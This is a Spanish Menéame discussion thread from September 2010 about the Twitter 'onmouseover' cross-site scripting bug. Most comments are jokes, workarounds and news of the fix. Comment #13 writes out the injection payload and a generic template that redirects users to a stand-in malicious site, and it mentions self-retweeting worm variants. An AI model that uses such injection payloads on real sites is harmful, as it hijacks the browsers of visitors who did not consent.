464 meneos
4535 clics

Un bug causa el caos en Twitter [ENG]

www.sophos.com/blogs/gc/g/2010/09/21/twitter-onmouseover-... 
por Dan el 21-09-2010 12:22 UTC publicado el 21-09-2010 12:35 UTC

El sitio web de Twitter está siendo victima de un ataque causado por usuarios que han encontrado con un fallo de seguridad que permite abrir mensajes pop-up y sitios web de terceros en el navegador con solo mover el ratón sobre un tweet.

etiquetas: twitter, bug, caos, fallo de seguridad
negativos: 1   usuarios: 260   anónimos: 204  
compartir:  twitter  facebook  tuenti  
64 comentarios tecnología, seguridad karma: 1234
  1. #1   Sinceramente, si cuando implementaron el 'onmouseover' para visualizar los perfiles, no taparon todos los potenciales problemas de seguridad... se lo merecen.

    Van a rodar cabezas.
    274  votos: 29   link
    el 21-09-2010 12:25 UTC por Milhaud Milhaud
  2. #2   El bug por ahora solo funciona en Twitter web. Quien usa aplicaciones de escritorio como twertdeck, se supone que está seguro.

    Me veo que muchos van a liarla parda con esto. Ya sabemos como es el ser humano con estas cosas y lo que puede llegar a hacer.
    37  votos: 2   link
    el 21-09-2010 12:25 UTC por Benjamin_Rosa Benjamin_Rosa
  3. #3   Más info en mashable.com/2010/09/21/twitter-mouseover-bug/
    23  votos: 1   link
    el 21-09-2010 12:25 UTC por Dan Dan
  4. #4   viva la web 2.0 bien diseñada :palm:
    37  votos: 3   link
    el 21-09-2010 12:25 UTC por --174255-- --174255--
  5. #5   twitFAIL ¬¬
    9  votos: 0   link
    el 21-09-2010 12:27 UTC por asobrino asobrino
  6. #6   ¿Alguien sabe cómo identificarlos?
    23  votos: 1   link
    el 21-09-2010 12:27 UTC por natrix natrix
  7. #7   Como dice #2 el problema es desde la página principal. Desde aplicaciones como echofon, tweetdeck o similares se está "a salvo".

    Bonito problemón le ha surgido a twitter.
    14  votos: 1   link
    el 21-09-2010 12:29 UTC por VITIMan VITIMan
  9. #9   Un ejemplo del exploit:

    twitter.com/victorianoi/status/25111494653
    20  votos: 1   link
    el 21-09-2010 12:29 UTC por Dan Dan
  10. #10   #9 Yo pongo el ratón sobre eso y no me pasa nada :-S
    14  votos: 0   link
    el 21-09-2010 12:30 UTC por kopra kopra
  11. #11   #10 tiene q aparecer en tu time line, osea, tienes q followear al usuario.
    11  votos: 0   link
    el 21-09-2010 12:30 UTC por Dan Dan
  12. #12   #11 ok
    14  votos: 0   link
    el 21-09-2010 12:31 UTC por kopra kopra
  13. #13   es tan sencillo como pegar un twitt como este:

    twitter.com/RainbowTwtr#@"onmouseover="javascript:window.loc = ‘http://www.miwebmaliciosaconexploit.com/’;"/

    es decir
    <url>#@"onmouseover=javascript:<codigojavscript>;"/

    ya si quieres la añades un hashtag para mas difusion...

    hay peña que se ha currado que te rellene tu formulario y retwittee el javascript y asi autorreplicandose..
    66  votos: 6   link
    el 21-09-2010 12:32 UTC por txupete txupete
  15. #15   Desde mobile.twitter.com/ no pasa nada.
    21  votos: 2   link
    el 21-09-2010 12:34 UTC por Joaqga Joaqga
  16. #16   Yo estaba flipando con lo que estaba leyendo en los timelines de la gente. Menos mal que uso un cliente y no lo he extendido más.
    De todas formas, tampoco me he extrañado demasiado, porque con las cosas que leo ahí de vez en cuando... ;)
    6  votos: 0   link
    el 21-09-2010 12:34 UTC por makormix makormix
  17. #17   ████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████
    183  votos: 20   link
    el 21-09-2010 12:35 UTC por yogurt yogurt
  18. #18   ¡Se acerca la destrucción del mundo tal y como lo conocemos! xD
    55  votos: 5   link
    el 21-09-2010 12:36 UTC por txentxubros txentxubros
  19. #19   La cosa va a peor
    17  votos: 0   link
    el 21-09-2010 12:44 UTC por yogurt yogurt
  20. #20   Pues oye, que les den a los programadores. No vigilar el injection es un error de campeonato. Vaya Fail más heavy.
    15  votos: 1   link
    el 21-09-2010 12:44 UTC por MMunera MMunera
  22. #22   enjuto se acaba de suicidar....
    29  votos: 2   link
    el 21-09-2010 12:46 UTC por montag montag
  23. #23   Joer, me he vuelto loco no sabía que pasaba... bueno, habrá que tirar de versión móvil, esperemos que se solucione pronto.
    6  votos: 0   link
    el 21-09-2010 12:46 UTC por tejano tejano
  24. #24   Por suerte no tenemos ningún exploit de los navegadores más famosos en acción.
    Si llegan a combinarlo con un buffer overflow de algún navegador sí que se podría haber liado parda.
    5  votos: 0   link
    el 21-09-2010 12:48 UTC por dxfilipo dxfilipo
  25. #25   Lo mejor es que si entras en twitter.com/ arriba del todo pone:
    ¡Una nueva experiencia de Twitter está a punto de llegar!

    xD xD xD xD
    203  votos: 21   link
    el 21-09-2010 12:48 UTC por angelitoMagno angelitoMagno
  26. #26   Whooops! Something went technically wrong!
    7  votos: 0   link
    el 21-09-2010 12:49 UTC por stoichkov stoichkov
  27. #27   El mileniarismo ha llegadoooo
    6  votos: 0   link
    el 21-09-2010 12:52 UTC por Agus Agus
  28. #28   Best solution for all web twitter users (until they fix the XSS): use mobile.twitter.com
    15  votos: 1   link
    el 21-09-2010 12:53 UTC por akilascartas akilascartas
  29. #29   Desactivando Javascript debería servir si el problema es el evento 'OnMouseOver'... ¿o esto no era de Javascript?
    6  votos: 0   link
    el 21-09-2010 12:56 UTC por vivazidane vivazidane
  30. #30   yo lo que no entiendo es eso que dicen del twitter de Sarah Brown UK.
    ¿Como llegó ese tweet ahí? No me lo explico
    7  votos: 0   link
    el 21-09-2010 12:59 UTC por pusilanime_hedonista pusilanime_hedonista
  31. #31   Supongo que será un caos de menos de 160 caracteres :-D

    Fdo: un no usuario de twitter
    6  votos: 0   link
    el 21-09-2010 12:59 UTC por mcklaw mcklaw
  32. #32   Voy a twittear la noticia..

    Edit: aagghh!! xD
    7  votos: 0   link
    el 21-09-2010 13:02 UTC por Maki_Nomiya Maki_Nomiya
  33. #33   #30 porque algunos exploits se autocopiaban en el formulario y se enviaban solos
    22  votos: 2   link
    el 21-09-2010 13:02 UTC por piticlibonito piticlibonito
  34. #34   ¡Vamos a morir todos!
    16  votos: 1   link
    el 21-09-2010 13:06 UTC por caguenross caguenross
  35. #35   El peor de todas las versiones de ese exploit, es el que te ocupa toda la pantalla y no te deja hacer nada, y se retwittea a @Matsta..por curiosidad he entrado en su perfil de twiter, y adivinad que se encuentra en www.matsta.org .......
    FAIL
    59  votos: 5   link
    el 21-09-2010 13:07 UTC por bimbokao bimbokao
  36. #36   A mi me lo han pasado... he podido entrar en mi perfil y hacer un undo del RT. Me esperaré a poder entrar.
    9  votos: 0   link
    el 21-09-2010 13:08 UTC por perseo perseo
  38. #38   #33 ahhhh
    :-)
    7  votos: 0   link
    el 21-09-2010 13:11 UTC por pusilanime_hedonista pusilanime_hedonista
  39. #39   #31 Se nota, se nota. Son 140 :-P
    24  votos: 2   link
    el 21-09-2010 13:15 UTC por maybe-me maybe-me
  40. #40   A mí me ha salido el de Matsta ese y me lo ha pasado angel martin el de SLQH
    Pa un dia que entro a twitter antes que a meneame...
    6  votos: 0   link
    el 21-09-2010 13:16 UTC por yknoy yknoy
  41. #41   Un ejemplo real (no hace falta tener cuenta de twitter): pasar el ratón por el twit que dice "No pases el ratón" twitter.com/carlospf (aparece un popup que pone "Hola")
    8  votos: 0   link
    el 21-09-2010 13:17 UTC por mr._cortimer mr._cortimer
  42. #42   ¡¡¡Dios mio!!! ¡Que tragedia! Se acerca la profecia maya.. :roll:
    11  votos: 2   link
    el 21-09-2010 13:21 UTC por orion1988 orion1988
  43. #43   A mi en Chrome en Mac no me sale nada :-(
    10  votos: 0   link
    el 21-09-2010 13:23 UTC por Ferran Ferran
  44. #44   Una solución momentánea si no queréis utilizar clientes de escritorio: bit.ly/19phLt
    67  votos: 6   link
    el 21-09-2010 13:30 UTC por vivazidane vivazidane
  45. #45   #6 si te viene un enlace raro no te pongas encima...
    13  votos: 0   link
    el 21-09-2010 13:30 UTC por cron cron
  46. #46   A llorar a Jerusalén!
    -1  votos: 1   link
    el 21-09-2010 13:34 UTC por citricut citricut
  47. #47   Se están montando parda en el Twitter...de todas formas es una cagada de primaria....
    10  votos: 0   link
    el 21-09-2010 13:40 UTC por damian damian
  48. #48   Joe, vaya susto. Yo pensaba que había fastidiado la configuración porque justo acaba de abrir una cuenta para un nuevo proyecto y me había petado en algún momento. Luego he ido a mirar el twitter de la empresa y lo mismo. Susto. Al final que me he quedado sin comer a la hora. Algo comeré ahora y como consuelo ante esta curiosa situación... viendo esto: www.youtube.com/watch?v=oHg5SJYRHA0
    10  votos: 0   link
    el 21-09-2010 13:42 UTC por oneras oneras
  49. #49   ¡¡¡El bug del Tiwtter ha salido en SLQH!!!
    -25  votos: 4   link
    el 21-09-2010 13:43 UTC por damian damian
  50. #50   A que hora fue eso, porque yo entre con firefox y no aparece nada!!
    6  votos: 0   link
    el 21-09-2010 13:44 UTC por HazCerveza HazCerveza
  51. #51   Parece que ya esta solucionado..
    7  votos: 0   link
    el 21-09-2010 13:44 UTC por txupete txupete
  52. #52   SIN COMENTARIOS.... ya se ha dicho todo.
    6  votos: 0   link
    el 21-09-2010 13:44 UTC por kherihon kherihon
  53. #53   Corrijo: parecia.. con el raton encima de la imagen del usuario sigue funcionando..
    7  votos: 0   link
    el 21-09-2010 13:55 UTC por txupete txupete
  54. #54   #49 Para que veas que los personajes del mundo de la televisión, entienden lo que quieren.
    www.meneame.net/story/berto-romero-lee-meneame....pero-no-entiende
    5  votos: 0   link
    el 21-09-2010 14:15 UTC por dxfilipo dxfilipo
  55. #55   En esto de las redes sociales nadie se escapa y comparado con los bugs de facebook, lo de Twitter sigue siendo aceptable :-)

    www.google.com/trends?q=bug+twitter%2C+bug+facebook&ctab=0&geo
    6  votos: 0   link
    el 21-09-2010 14:23 UTC por sithwoody sithwoody
  56. #56   Lleva un rato arreglado ( status.twitter.com/post/1161435117/xss-attack-identified-and-patched ). Borrar temporales, cookies, etc; cerrar y volver a abrir ;)
    29  votos: 2   link
    el 21-09-2010 14:23 UTC por tsme tsme
  57. #57   #18 Póngamosle música :-P
    www.youtube.com/watch?v=Z0GFRcFm-aY
    9  votos: 0   link
    el 21-09-2010 14:45 UTC por tatooine tatooine
  58. #58   Ésto no pasaría si ...
    6  votos: 0   link
    el 21-09-2010 14:51 UTC por --159841-- --159841--
  59. #59   #20 FAIL! es un XSS (cross site scripting)
    6  votos: 0   link
    el 21-09-2010 15:11 UTC por bcnrider bcnrider
  60. #60   No lo veo gracias a noscript, pero no es que me importe, tampoco uso twitter.
    6  votos: 0   link
    el 21-09-2010 16:59 UTC por Arth Arth
  62. #62   #55 algo tendrá que ver tambien el número de usuarios no?
    11  votos: 0   link
    el 21-09-2010 19:49 UTC por UlisesRey UlisesRey
  63. #63   Como todo en la web 2.0 el prueba y error sigue siendo la estrella, bien por los empleados de twitter que solucionaron el problema a la brevedad.
    En mi caso uso TweetDeck asi que ni me entere :-)
    5  votos: 0   link
    el 21-09-2010 20:58 UTC por delegar delegar
  64. #64   Curiosidad o no, pero también actualizaron la aplicación para Android, no sé si también tenía algún problemilla...
    6  votos: 0   link
    el 22-09-2010 08:45 UTC por Smoje Smoje
comentarios cerrados

menéame